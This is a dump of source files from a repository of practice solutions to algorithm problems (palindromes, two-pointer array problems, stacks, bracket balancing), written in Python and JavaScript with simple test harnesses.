Test cases (black box - unit testing)\ntestCases = [\n { 'assert': smallestDifference([-1, 5, 10, 20, 28, 3], [26, 134, 135, 15, 17]), 'expected': [28, 26] },\n { 'assert': smallestDifference([-1, 5, 10, 20, 3], [26, 134, 135, 15, 17]), 'expected': [20, 17] },\n { 'assert': smallestDifference([10, 0, 20, 25], [1005, 1006, 1014, 1032, 1031]), 'expected': [25, 1005] },\n \n # Boundary conditions (empty lists, singleton list, large numbers, small numbers)\n { 'assert': smallestDifference(), 'expected': [] },\n { 'assert': smallestDifference([]), 'expected': [] },\n { 'assert': smallestDifference([], []), 'expected': [] },\n { 'assert': smallestDifference([1], [1]), 'expected': [1, 1] },\n { 'assert': smallestDifference([1, 2, 3, 4]), 'expected': [] },\n { 'assert': smallestDifference([-1, -1, -1], [-1, -1, -1]), 'expected': [-1, -1] },\n\n # Extremes\n]\n\n# Run tests\nfor (index, test) in enumerate(testCases):\n print(f'# Test {index + 1}')\n print(f'Actual: {test[\"assert\"]}')\n print(f'Expected: {test[\"expected\"]}')\n print('🤘 Test PASSED 🤘' if test[\"assert\"] == test[\"expected\"] else '👎 Test FAILED 👎', '\\n')\n\n" }, { "alpha_fraction": 0.5903835892677307, "alphanum_fraction": 0.5940620303153992, "avg_line_length": 29.43199920654297, "blob_id": "e4d5d5f1b022e9708cd5e08d1d90f6549015874f", "content_id": "17c67f275f2dca25c805a0dccae6926cbc269ec8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3818, "license_type": "permissive", "max_line_length": 95, "num_lines": 125, "path": "/Strings/palindrome-check.py", "repo_name": "henryoliver/algo-expert-solutions", "src_encoding": "UTF-8", "text": "# def isPalindrome(string=''):\n# '''\n# Solution 1 - Reverse array last first\n#\n# Complexity Analysis\n# O(n) time | O(n) space\n#\n# Check if non-empty string is a palindrome\n#\n# string: non-empty string\n# return: boolean\n# '''\n# # Gracefully handle type and Falsy values\n# if (not isinstance(string, 
str) or string == ''):\n# print('Argument should be a valid non-empty string')\n# return False\n#\n# if (len(string) == 1):\n# return True\n#\n# reversedChars = []\n#\n# for i in reversed(range(len(string))):\n# reversedChars.append(string[i])\n#\n# return string.lower() == ''.join(reversedChars).lower()\n\n# def isPalindrome(string='', i=0):\n# '''\n# Solution 2 - Recursion\n#\n# Complexity Analysis\n# O(n) time | O(n) space\n#\n# Check if non-empty string is a palindrome\n#\n# string: non-empty string\n# return: boolean\n# '''\n# # Gracefully handle type and Falsy values\n# if (not isinstance(string, str) or string == ''):\n# print('Argument should be a valid non-empty string')\n# return False\n#\n# j = len(string) - 1\n#\n# firstChar = string[i]\n# lastChar = string[j - i]\n#\n# # Base case\n# if (i >= j):\n# return True\n#\n# if (firstChar.lower() == lastChar.lower()):\n# return isPalindrome(string, i + 1)\n# else:\n# return False\n#\n\ndef isPalindrome(string=''):\n '''\n Solution 3 - Pointers\n\n Complexity Analysis\n O(n) time | O(1) space\n\n Check if non-empty string is a palindrome\n\n string: non-empty string\n return: boolean\n '''\n # Gracefully handle type and Falsy values\n if (not isinstance(string, str) or string == ''):\n print('Argument should be a valid non-empty string')\n return False\n\n if (len(string) == 1):\n return True\n\n for i in range(len(string)):\n leftPointer = string[i]\n rightPointer = string[len(string) - 1 - i]\n\n if (leftPointer.lower() != rightPointer.lower()):\n return False\n\n return True\n\n\n# Test cases (black box - unit testing)\ntestCases = [\n # Normal\n # Data that is typical ('expected') and should be accepted by the system.\n { 'assert': isPalindrome('Wow'), 'expected': True },\n { 'assert': isPalindrome('Anna'), 'expected': True },\n { 'assert': isPalindrome('Kayak'), 'expected': True },\n { 'assert': isPalindrome('1abcba1'), 'expected': True },\n { 'assert': isPalindrome('AbCdcBa'), 'expected': True },\n { 
'assert': isPalindrome('Repaper'), 'expected': True },\n { 'assert': isPalindrome('abcdefg'), 'expected': False },\n { 'assert': isPalindrome('Hello World'), 'expected': False },\n\n # Boundary data (extreme data, edge case)\n # Data at the upper or lower limits of expectations that should be accepted by the system.\n { 'assert': isPalindrome('a'), 'expected': True },\n { 'assert': isPalindrome('tattarrattat'), 'expected': True },\n\n # Abnormal data (erroneous data)\n # Data that falls outside of what is acceptable and should be rejected by the system.\n { 'assert': isPalindrome(), 'expected': False },\n { 'assert': isPalindrome(0), 'expected': False },\n { 'assert': isPalindrome(''), 'expected': False },\n { 'assert': isPalindrome([]), 'expected': False },\n { 'assert': isPalindrome(()), 'expected': False },\n { 'assert': isPalindrome({}), 'expected': False },\n { 'assert': isPalindrome(None), 'expected': False },\n { 'assert': isPalindrome(False), 'expected': False }\n]\n\n# Run tests\nfor (index, test) in enumerate(testCases):\n print(f'# Test {index + 1}')\n print(f'Actual: {test[\"assert\"]}')\n print(f'expected: {test[\"expected\"]}')\n print('🤘 Test PASSED 🤘' if test[\"assert\"] == test[\"expected\"] else '👎 Test FAILED 👎', '\\n')\n\n\n" }, { "alpha_fraction": 0.5403546690940857, "alphanum_fraction": 0.5635179281234741, "avg_line_length": 28.073684692382812, "blob_id": "ddacc87b6d6f537536b62325af77725edf5ea882", "content_id": "b590123889730dbc5da2da7259724bcb0e179406", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2775, "license_type": "permissive", "max_line_length": 102, "num_lines": 95, "path": "/Arrays/move-element-to-end.py", "repo_name": "henryoliver/algo-expert-solutions", "src_encoding": "UTF-8", "text": "# Move Element To End\n\n# def moveElementToEnd(array=[], toMove=0):\n# '''\n# Solution 1 - Queue tracking system\n#\n# O(n) time | O(n) space\n#\n# array: a list of integers\n# 
toMove: an integer\n# return: a list in place\n# '''\n# # Queue - FIFO\n# class Queue:\n# def __init__(self):\n# self.queue = []\n#\n# def enqueue(self, item):\n# self.queue.append(item)\n#\n# def dequeue(self):\n# return self.queue.pop(0)\n#\n# def isEmpty(self):\n# return len(self.queue) == 0\n#\n# toMoveIndexesQueue = Queue()\n#\n# for currentIndex in range(len(array)):\n# currentNumber = array[currentIndex]\n#\n# if (currentNumber == toMove):\n# toMoveIndexesQueue.enqueue(currentIndex)\n# elif (toMoveIndexesQueue.isEmpty() == False):\n# firstToMoveIndex = toMoveIndexesQueue.dequeue();\n#\n# array[currentIndex] = array[firstToMoveIndex]\n# array[firstToMoveIndex] = currentNumber\n#\n# toMoveIndexesQueue.enqueue(currentIndex)\n#\n# return array\n\ndef moveElementToEnd(array=[], toMove=0):\n '''\n Solution 2 - Pointers narrowing approach\n\n O(n) time | O(1) space\n\n array: a list of integers\n toMove: an integer\n return: a list in place\n '''\n leftPointer = 0\n rightPointer = len(array) - 1\n\n while (leftPointer < rightPointer):\n leftNumber = array[leftPointer]\n rightNumber = array[rightPointer]\n\n if (leftNumber == toMove and rightNumber != toMove):\n array[leftPointer] = rightNumber\n array[rightPointer] = leftNumber\n\n leftPointer += 1\n rightPointer -= 1\n elif (rightNumber == toMove):\n rightPointer -= 1\n elif (leftNumber != toMove):\n leftPointer += 1\n\n return array\n\n\n\n# Test cases (black box - unit testing)\ntestCases = [\n { 'assert': moveElementToEnd([2, 1, 2, 2, 2, 3, 4, 2], 2), 'expected': [1, 3, 4, 2, 2, 2, 2, 2] },\n { 'assert': moveElementToEnd([1, 2, 4, 5, 6], 3), 'expected': [1, 2, 4, 5, 6] },\n { 'assert': moveElementToEnd([3, 3, 3, 3, 3], 3), 'expected': [3, 3, 3, 3, 3] },\n { 'assert': moveElementToEnd([1, 2, 4, 5, 3], 3), 'expected': [1, 2, 4, 5, 3] },\n \n # Boundary conditions (empty lists, singleton list, large numbers, small numbers)\n { 'assert': moveElementToEnd(), 'expected': [] },\n { 'assert': moveElementToEnd([]), 
'expected': [] },\n\n # Extremes\n]\n\n# Run tests\nfor (index, test) in enumerate(testCases):\n print(f'# Test {index + 1}')\n print(f'Actual: {test[\"assert\"]}')\n print(f'Expected: {test[\"expected\"]}')\n print('🤘 Test PASSED 🤘' if test[\"assert\"] == test[\"expected\"] else '👎 Test FAILED 👎', '\\n')\n\n" }, { "alpha_fraction": 0.5776196718215942, "alphanum_fraction": 0.5963777303695679, "avg_line_length": 23.15625, "blob_id": "50f863d3b01cb6e09de5ec552d06b615181b4e89", "content_id": "d345eb130483e184783b8c4b8bae566077025c29", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1546, "license_type": "permissive", "max_line_length": 55, "num_lines": 64, "path": "/Stacks/min-max-stack-construction.py", "repo_name": "henryoliver/algo-expert-solutions", "src_encoding": "UTF-8", "text": "class MinMaxStack:\n def __init__(self):\n self.stack = []\n self.minMaxStack = []\n\n # O(1) time | O(1) space\n def peek(self):\n if (len(self.stack)):\n return self.stack[-1]\n\n return None\n\n # O(1) time | O(1) space\n def pop(self):\n if (len(self.stack)):\n self.minMaxStack.pop()\n return self.stack.pop()\n\n return None\n\n # Procidure \n # O(1) time | O(1) space\n def push(self, number):\n minNumber = number\n maxNumber = number\n\n if (len(self.minMaxStack)):\n lastMinMax = self.minMaxStack[-1]\n minNumber = min(lastMinMax[0], minNumber)\n maxNumber = max(lastMinMax[1], maxNumber)\n\n self.stack.append(number)\n self.minMaxStack.append((minNumber, maxNumber))\n\n print(self.stack)\n print(self.minMaxStack)\n\n # O(1) time | O(1) space\n def getMin(self):\n if (len(self.minMaxStack)):\n return self.minMaxStack[-1][0]\n\n return None\n\n # O(1) time | O(1) space\n def getMax(self):\n if (len(self.minMaxStack)):\n return self.minMaxStack[-1][1]\n\n return None\n\nnewMinMaxStack = 
MinMaxStack()\n\nprint(newMinMaxStack.push(1))\nprint(newMinMaxStack.push(2))\nprint(newMinMaxStack.push(3))\nprint(newMinMaxStack.push(-2))\nprint(newMinMaxStack.push(-40))\nprint(newMinMaxStack.push(0))\nprint(newMinMaxStack.push(32))\nprint(newMinMaxStack.push(21))\nprint(newMinMaxStack.peek())\nprint(newMinMaxStack.getMin())\nprint(newMinMaxStack.getMax())\n" }, { "alpha_fraction": 0.519391655921936, "alphanum_fraction": 0.5224334597587585, "avg_line_length": 26.978723526000977, "blob_id": "7604c80a99035ca7c9a28454d5546cd386ef52f1", "content_id": "12fcc04a9a72f6a9102511b1e902ad3f7d74d1a4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1315, "license_type": "permissive", "max_line_length": 75, "num_lines": 47, "path": "/Stacks/balanced-brackets.js", "repo_name": "henryoliver/algo-expert-solutions", "src_encoding": "UTF-8", "text": "/**\n * The function should return a boolean representing whether the string is \n * balenced with regards to brackets\n *\n * Complexity Analysis\n * O(n) time | O(n) space\n *\n * @param string - string made up of brackets and other optional characters\n * @returns boolean - string is balenced or not\n */\n// const balancedBrackets = (string) => {\n// const stack = [];\n// const matchBrackets = {')': '(', ']': '[', '}': '{'};\n//\n// for (const char of string) {\n// if (Object.values(matchBrackets).includes(char)) {\n// stack.push(char);\n// } else if (Object.keys(matchBrackets).includes(char)) {\n// if (matchBrackets[char] === stack[stack.length - 1]) {\n// stack.pop();\n// } else {\n// return false;\n// }\n// }\n// }\n//\n// return stack.length === 0;\n// };\n\nconst balancedBrackets = (string = '') => {\n const openBrackets = '([{';\n const closeBrackets = ')]}'; \n\n const result = Array.from(string).reduce((acc, curr) => {\n if (openBrackets.includes(curr)) {\n return ++acc;\n } else if (closeBrackets.includes(curr)) {\n return --acc;\n }\n\n return acc;\n 
}, 0);\n\n return result === 0;\n};\n\nconsole.debug(balancedBrackets('{[[[[({(}))]]]]}'));\n" }, { "alpha_fraction": 0.6066201329231262, "alphanum_fraction": 0.6106732487678528, "avg_line_length": 28.79865837097168, "blob_id": "98cf5288c17706f2b2a402e172266b0065caec3a", "content_id": "9a66eef21283ea61fc9682ce0886bc6392041e28", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4453, "license_type": "permissive", "max_line_length": 112, "num_lines": 149, "path": "/Strings/palindrome-check.js", "repo_name": "henryoliver/algo-expert-solutions", "src_encoding": "UTF-8", "text": "/**\n * Solution 1 - Reverse array last to first\n *\n * Complexity Analysis\n * O(n) time | O(n) space\n *\n * Check if non-empty string is a palindrome\n *\n * @param {string} non-empty string\n * @returns {boolean} \n */\nfunction isPalindrome(string = '') {\n // Assertions\n console.assert(typeof string === 'string' && string !== '', 'Parameter should be a valid non-empty string');\n\n // Gracefully handle type and Falsy values\n if (typeof string !== 'string' || string === '') {\n console.error('Parameter should be a valid non-empty string');\n return false;\n }\n\n if (string.length === 1) {\n return true;\n }\n\n const reversedChars = [];\n\n for (let i = string.length - 1; i >= 0; i--) {\n reversedChars.push(string[i]);\n }\n\n return string.toLowerCase() === reversedChars.join('').toLowerCase();\n}\n\n/**\n * Solution 2 - Recursion\n *\n * Complexity Analysis\n * O(n) time | O(n) space\n *\n * Check if non-empty string is a palindrome\n *\n * @param {string} non-empty string\n * @returns {boolean} \n */\n// function isPalindrome(string = '', i = 0) {\nfunction isPalindrome(string = '', i = 0) {\n // Gracefully handle type and Falsy values\n if (typeof string !== 'string' || string === '') {\n console.error('Parameter should be a valid non-empty string');\n return false;\n }\n\n const j = string.length - 1 - i;\n\n const 
firstChar = string[i];\n const lastChar = string[j];\n\n // Base case\n if (i >= j) {\n return true;\n }\n\n if (firstChar.toLowerCase() === lastChar.toLowerCase()) {\n return isPalindrome(string, i + 1);\n } else {\n return false;\n }\n}\n\n/**\n * Solution 3 - Pointers\n *\n * Complexity Analysis\n * O(n) time | O(1) space\n *\n * Check if non-empty string is a palindrome\n *\n * @param {string} non-empty string\n * @returns {boolean} \n */\nfunction isPalindrome(string = '') {\n // Assertions\n console.assert(typeof string === 'string' && string !== '', 'Parameter should be a valid non-empty string');\n\n // Gracefully handle type and Falsy values\n if (typeof string !== 'string' || string === '') {\n console.error('Parameter should be a valid non-empty string');\n return false;\n }\n\n if (string.length === 1) {\n return true;\n }\n\n for (let i = 0; i < string.length; i++) {\n const firstChar = string[i];\n const lastChar = string[string.length - 1 - i];\n\n if (firstChar.toLowerCase() !== lastChar.toLowerCase()) {\n return false;\n }\n }\n\n return true;\n}\n\nconst testCases = [\n // Normal\n // Data that is typical (expected) and should be accepted by the system.\n { assert: isPalindrome('Wow'), expected: true },\n { assert: isPalindrome('Anna'), expected: true },\n { assert: isPalindrome('Kayak'), expected: true },\n { assert: isPalindrome('1abcba1'), expected: true },\n { assert: isPalindrome('AbCdcBa'), expected: true },\n { assert: isPalindrome('Repaper'), expected: true },\n { assert: isPalindrome('abcdefg'), expected: false },\n { assert: isPalindrome('Hello World'), expected: false },\n\n // Boundary data (extreme data, edge case)\n // Data at the upper or lower limits of expectations that should be accepted by the system.\n { assert: isPalindrome('a'), expected: true },\n { assert: isPalindrome('tattarrattat'), expected: true },\n\n // Abnormal data (erroneous data)\n // Data that falls outside of what is acceptable and should be rejected by the 
system.\n { assert: isPalindrome(), expected: false },\n { assert: isPalindrome(0), expected: false },\n { assert: isPalindrome(''), expected: false },\n { assert: isPalindrome([]), expected: false },\n { assert: isPalindrome({}), expected: false },\n { assert: isPalindrome(NaN), expected: false },\n { assert: isPalindrome(null), expected: false },\n { assert: isPalindrome(false), expected: false },\n { assert: isPalindrome(new Set()), expected: false },\n { assert: isPalindrome(new Map()), expected: false },\n { assert: isPalindrome(undefined), expected: false },\n];\n\n// Run tests\ntestCases.forEach((test, index) => {\n const currentTest = `# Test ${index + 1}`;\n\n console.group(currentTest);\n console.log('Actual: ', test.assert);\n console.log('Expected: ', test.expected);\n console.log(test.assert === test.expected ? '🤘 Test PASSED 🤘' : '👎 Test FAILED 👎', '\\n');\n console.groupEnd(currentTest);\n});\n\n" }, { "alpha_fraction": 0.8113207817077637, "alphanum_fraction": 0.8113207817077637, "avg_line_length": 25.5, "blob_id": "1b2f60a0d72c72895646e53e3c0afcb1ffd97584", "content_id": "c2974b27b1face0151f02c53f7d86868a0a55260", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 53, "license_type": "permissive", "max_line_length": 28, "num_lines": 2, "path": "/README.md", "repo_name": "henryoliver/algo-expert-solutions", "src_encoding": "UTF-8", "text": "# algo-expert-solutions\nMy solutions for Algo Expert\n" }, { "alpha_fraction": 0.545509934425354, "alphanum_fraction": 0.5654205679893494, "avg_line_length": 31.375, "blob_id": "9b72644b55e13daa764399c2c70e07c55ee49818", "content_id": "8aa328b752563ffd254e477b69158f4323bd2482", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4934, "license_type": "permissive", "max_line_length": 126, "num_lines": 152, "path": "/Arrays/four-number-sum.py", "repo_name": 
"henryoliver/algo-expert-solutions", "src_encoding": "UTF-8", "text": "def fourNumberSum(array=[], targetSum=0):\n '''\n Solution 1\n\n O(n^4) time | O(n) space\n\n The function should find all quadruplets in the array that sum up\n to the target sum and return a two-dimensional array of all these quadruplets.\n\n array: a list of integers\n targetSum: an integer\n return: a two-dimensional list of all found quadruplets\n '''\n # Remove duplicates and sort the list\n array = sorted(list(dict.fromkeys(array)))\n\n foundQuadruplets = [];\n\n for i in range(len(array) - 3):\n firstNumber = array[i]\n\n for j in range(i + 1, len(array) - 2):\n secondNumber = array[j]\n\n for k in range(j + 1, len(array) - 1):\n thirdNumber = array[k]\n\n for l in range(k + 1, len(array)):\n fourthNumber = array[l]\n\n if (firstNumber + secondNumber + thirdNumber + fourthNumber == targetSum):\n foundQuadruplets.append([firstNumber, secondNumber, thirdNumber, fourthNumber])\n\n return foundQuadruplets\n\ndef fourNumberSum(array=[], targetSum=0):\n '''\n Solution 2 - Hash map\n\n O(n^3) time | O(n^2) space\n\n The function should find all quadruplets in the array that sum up\n to the target sum and return a two-dimensional array of all these quadruplets.\n\n array: a list of integers\n targetSum: an integer\n return: a two-dimensional list of all found quadruplets\n '''\n # Remove duplicates and sort the list\n array = sorted(list(dict.fromkeys(array)))\n\n trackedSums = {}\n foundQuadruplets = []\n\n for i in range(1, len(array)):\n\n # Inner loop after\n if (trackedSums):\n j = i + 1\n\n while (j < len(array)):\n currentSum = array[i] + array[j] # P = x + y\n difference = targetSum - currentSum\n\n if (difference in trackedSums):\n trackedSum = trackedSums[difference]\n\n for sumPair in trackedSum:\n foundQuadruplets.append(sorted([*sumPair, array[i], array[j]]))\n\n j += 1\n\n # Inner loop before\n k = 0\n\n while (k < i):\n currentSum = array[i] + array[k] # Q = z + k\n difference = 
targetSum - currentSum\n\n if (currentSum in trackedSums):\n trackedSums[currentSum].append([array[i], array[k]])\n else:\n trackedSums[currentSum] = [[array[i], array[k]]]\n\n k += 1\n\n foundQuadruplets.sort()\n\n return foundQuadruplets\n\ndef fourNumberSum(array=[], targetSum=0):\n '''\n Solution 3 - Sorting along with the two-pointer sliding window approach\n\n O(n^3) time | O(n^2) space\n\n The function should find all quadruplets in the array that sum up\n to the target sum and return a two-dimensional array of all these quadruplets.\n\n array: a list of integers\n targetSum: an integer\n return: a two-dimensional list of all found quadruplets\n '''\n # Remove duplicates and sort the list\n array = sorted(list(dict.fromkeys(array)))\n\n foundQuadruplets = []\n\n for i in range(len(array) - 3):\n for j in range(i + 1, len(array) - 2):\n leftPointer = j + 1\n rightPointer = len(array) - 1\n\n while (leftPointer < rightPointer):\n currentSum = array[i] + array[j] + array[leftPointer] + array[rightPointer]\n\n if (currentSum == targetSum):\n foundQuadruplets.append(sorted([array[i], array[j], array[leftPointer], array[rightPointer]]))\n leftPointer += 1\n rightPointer -= 1\n elif (currentSum < targetSum):\n leftPointer += 1\n elif (currentSum > targetSum):\n rightPointer -= 1\n\n foundQuadruplets.sort()\n\n return foundQuadruplets\n\n\n# Test cases (black box - unit testing)\ntestCases = [\n { 'assert': fourNumberSum([1, 2, 3, 4, 5, 6, 7], 10), 'expected': [[1, 2, 3, 4]] },\n { 'assert': fourNumberSum([7, 6, 4, -1, 1, 2], 16), 'expected': [[ -1, 4, 6, 7 ], [ 1, 2, 6, 7 ]] },\n { 'assert': fourNumberSum([5, -5, -2, 2, 3, -3], 0), 'expected': [[ -5, -2, 2, 5 ], [ -5, -3, 3, 5 ], [ -3, -2, 2, 3 ]] },\n \n # Boundary conditions (empty lists, singleton list, large numbers, small numbers)\n { 'assert': fourNumberSum(), 'expected': [] },\n { 'assert': fourNumberSum([], 0), 'expected': [] },\n { 'assert': fourNumberSum([1], 10), 'expected': [] },\n { 'assert': 
fourNumberSum([1, 2, 3, 4]), 'expected': [] },\n { 'assert': fourNumberSum([], 1000000000), 'expected': [] },\n\n # Extremes\n]\n\n# Run tests\nfor (index, test) in enumerate(testCases):\n print(f'# Test {index + 1}')\n print(f'Actual: {test[\"assert\"]}')\n print(f'Expected: {test[\"expected\"]}')\n print('🤘 Test PASSED 🤘' if test[\"assert\"] == test[\"expected\"] else '👎 Test FAILED 👎', '\\n')\n\n" }, { "alpha_fraction": 0.5568826794624329, "alphanum_fraction": 0.6049566864967346, "avg_line_length": 32.470001220703125, "blob_id": "20ddd9596945a8b7fcc4f9d16c37fa21401ca700", "content_id": "aba897cb843b97b739589728891872fd2f0c0ead", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 3361, "license_type": "permissive", "max_line_length": 166, "num_lines": 100, "path": "/Arrays/smallest-difference.js", "repo_name": "henryoliver/algo-expert-solutions", "src_encoding": "UTF-8", "text": "// Smallest Difference\n\n/**\n * Solution 1 - Brute force (aka: Naive)\n *\n * Complexity Analysis\n * O(n^2) time | O(1) space\n *\n * @param {array} arrayOne - non-empty array of integers\n * @param {array} arrayTwo - non-empty array of integers\n * @returns {array} array containing these two numbers\n */\nfunction smallestDifference(arrayOne = [], arrayTwo = []) {\n let closestPair = [];\n let closestNumber = Infinity;\n \n for (let i = 0; i < arrayOne.length; i++) {\n for (let j = 0; j < arrayTwo.length; j++) {\n const absoluteDiff = Math.abs(arrayOne[i] - arrayTwo[j]);\n\n if (absoluteDiff < closestNumber) {\n closestNumber = absoluteDiff;\n closestPair = [arrayOne[i], arrayTwo[j]];\n }\n }\n }\n\n return closestPair;\n}\n\n/**\n * Solution 2 - Sorting along with the two-pointer sliding window approach\n *\n * Complexity Analysis\n * O(n log(n) + m log(m)) time | O(1) space\n *\n * @param {array} arrayOne - non-empty array of integers\n * @param {array} arrayTwo - non-empty array of integers\n * @returns {array} 
array containing these two numbers\n */\nfunction smallestDifference(arrayOne = [], arrayTwo = []) {\n arrayOne.sort((a, b) => a - b);\n arrayTwo.sort((a, b) => a - b);\n\n let closestPair = [];\n let closestNumber = Infinity;\n\n let arrayOnePointer = 0;\n let arrayTwoPointer = 0;\n\n while (arrayOnePointer < arrayOne.length && arrayTwoPointer < arrayTwo.length) {\n let firstNumber = arrayOne[arrayOnePointer];\n let secondNumber = arrayTwo[arrayTwoPointer];\n let currentAbsDiff = Math.abs(firstNumber - secondNumber);\n\n if (currentAbsDiff < closestNumber) {\n closestNumber = currentAbsDiff;\n closestPair = [firstNumber, secondNumber];\n }\n\n if (firstNumber < secondNumber) {\n arrayOnePointer++;\n } else if (secondNumber < firstNumber) {\n arrayTwoPointer++;\n } else {\n closestPair = [firstNumber, secondNumber];\n break;\n }\n }\n\n return closestPair;\n}\n\n\n// Test cases (black box - unit testing)\nconst testCases = [\n { assert: smallestDifference([-1, 5, 10, 20, 28, 3], [26, 134, 135, 15, 17]), expected: [28, 26] },\n { assert: smallestDifference([-1, 5, 10, 20, 3], [26, 134, 135, 15, 17]), expected: [20, 17] },\n { assert: smallestDifference([10, 0, 20, 25], [1005, 1006, 1014, 1032, 1031]), expected: [25, 1005] },\n \n // Boundary conditions (empty lists, singleton list, large numbers, small numbers)\n { assert: smallestDifference(), expected: [] },\n { assert: smallestDifference([], []), expected: [] },\n { assert: smallestDifference([0]), expected: [] },\n { assert: smallestDifference([], [0]), expected: [] },\n\n // Extremes\n { assert: smallestDifference([10, 1000, 9124, 2142, 59, 24, 596, 591, 124, -123, 530], [-1441, -124, -25, 1014, 1500, 660, 410, 245, 530]), expected: [530, 530] }\n];\n\n// Run tests\ntestCases.forEach((test, index) => {\n const currentTest = `# Test ${index + 1}`;\n\n console.group(currentTest);\n console.log('Actual: ', test.assert);\n console.log('Expected: ', test.expected);\n console.log(JSON.stringify(test.assert) === 
JSON.stringify(test.expected) ? '🤘 Test PASSED 🤘' : '👎 Test FAILED 👎', '\\n');\n console.groupEnd(currentTest);\n});\n\n\n" }, { "alpha_fraction": 0.5621734857559204, "alphanum_fraction": 0.58411705493927, "avg_line_length": 28.275510787963867, "blob_id": "fc1d84df921f718953bae6c14052e3e56765987a", "content_id": "7e08feed0f89df39e33b132701f8d974f5c5cb4b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2883, "license_type": "permissive", "max_line_length": 125, "num_lines": 98, "path": "/Arrays/move-element-to-end.js", "repo_name": "henryoliver/algo-expert-solutions", "src_encoding": "UTF-8", "text": "// Smallest Difference\n\n/**\n * Solution 1 - Queue tracking system\n *\n * Complexity Analysis\n * O(n) time | O(n) space\n *\n * @param {array} array of integers\n * @param {toMove} integer\n * @returns {array} array in place\n */\nfunction moveElementToEnd(array = [], toMove = 0) {\n // Queue\n const queue = ({ queue = [] } = {}) => ({\n enqueue: (item) => queue.push(item),\n dequeue: () => queue.shift(),\n isEmpty: () => queue.length === 0\n });\n\n const toMoveIndexesQueue = queue();\n\n for (let currentIndex in array) {\n const currentNumber = array[currentIndex];\n\n if (currentNumber === toMove) {\n toMoveIndexesQueue.enqueue(Number(currentIndex));\n } else if (toMoveIndexesQueue.isEmpty() === false) {\n const firstToMoveIndex = toMoveIndexesQueue.dequeue();\n\n array[currentIndex] = array[firstToMoveIndex];\n array[firstToMoveIndex] = currentNumber;\n\n toMoveIndexesQueue.enqueue(Number(currentIndex));\n }\n }\n \n return array;\n}\n\n/**\n * Solution 2 - Pointers narrowing approach\n *\n * Complexity Analysis\n * O(n) time | O(1) space\n *\n * @param {array} array of integers\n * @param {toMove} integer\n * @returns {array} array in place\n */\nfunction moveElementToEnd(array = [], toMove = 0) {\n let leftPointer = 0;\n let rightPointer = array.length - 1;\n\n do {\n const leftNumber = 
array[leftPointer];\n const rightNumber = array[rightPointer];\n\n if (leftNumber === toMove && rightNumber !== toMove) {\n array[leftPointer] = rightNumber;\n array[rightPointer] = leftNumber;\n\n leftPointer += 1;\n rightPointer -= 1;\n } else if (rightNumber === toMove) {\n rightPointer -= 1;\n } else if (leftNumber !== toMove) {\n leftPointer += 1;\n }\n } while (leftPointer < rightPointer);\n\n return array;\n}\n\n\n// Test cases (black box - unit testing)\nconst testCases = [\n { assert: moveElementToEnd([2, 1, 2, 2, 2, 3, 4, 2], 2), expected: [1, 3, 4, 2, 2, 2, 2, 2] },\n { assert: moveElementToEnd([1, 2, 4, 5, 6], 3), expected: [1, 2, 4, 5, 6] },\n { assert: moveElementToEnd([3, 3, 3, 3, 3], 3), expected: [3, 3, 3, 3, 3] },\n { assert: moveElementToEnd([1, 2, 4, 5, 3], 3), expected: [1, 2, 4, 5, 3] },\n \n // Boundary conditions (empty lists, singleton list, large numbers, small numbers)\n { assert: moveElementToEnd(), expected: [] },\n\n // Extremes\n];\n\n// Run tests\ntestCases.forEach((test, index) => {\n const currentTest = `# Test ${index + 1}`;\n\n console.group(currentTest);\n console.log('Actual: ', test.assert);\n console.log('Expected: ', test.expected);\n console.log(JSON.stringify(test.assert) === JSON.stringify(test.expected) ? 
'🤘 Test PASSED 🤘' : '👎 Test FAILED 👎', '\\n');\n console.groupEnd(currentTest);\n});\n\n\n" }, { "alpha_fraction": 0.5667613744735718, "alphanum_fraction": 0.5696022510528564, "avg_line_length": 28.33333396911621, "blob_id": "4f347349733cd1da5a6296b61ba71e6d579938d1", "content_id": "09738c5662ef296adbb343b3c0cf0c07217120f4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 704, "license_type": "permissive", "max_line_length": 75, "num_lines": 24, "path": "/Stacks/balanced-brackets.py", "repo_name": "henryoliver/algo-expert-solutions", "src_encoding": "UTF-8", "text": "def balancedBrackets(string=''):\n '''\n The function should return a boolean representing whether the string is\n balenced with regards to brackets\n\n Complexity Analysis\n O(n) time | O(n) space\n\n string: string made up of brackets and other optional characters\n return: boolean - string is balenced or not\n '''\n stack = []\n matchBrackets = {')': '(', ']': '[', '}': '{'}\n\n for char in string:\n if (char in matchBrackets.values()):\n stack.append(char)\n elif (char in matchBrackets):\n if (matchBrackets[char] == (stack or [None])[-1]):\n stack.pop()\n else:\n return False\n\n return len(stack) == 0\n" } ]
13
jbb1999/Doggydiscordbot
https://github.com/jbb1999/Doggydiscordbot
f6e4ad0d0d0424e3984e29190a475f4abda0d8b8
5c6a2f94c9fa2902db45b635262825c6e6f26a87
9e39c8d1fda848ce6ec4d76f36e0df4a01ab033b
refs/heads/main
2023-05-28T17:36:11.032171
2021-06-17T16:51:37
2021-06-17T16:51:37
377,832,360
0
0
null
null
null
null
null
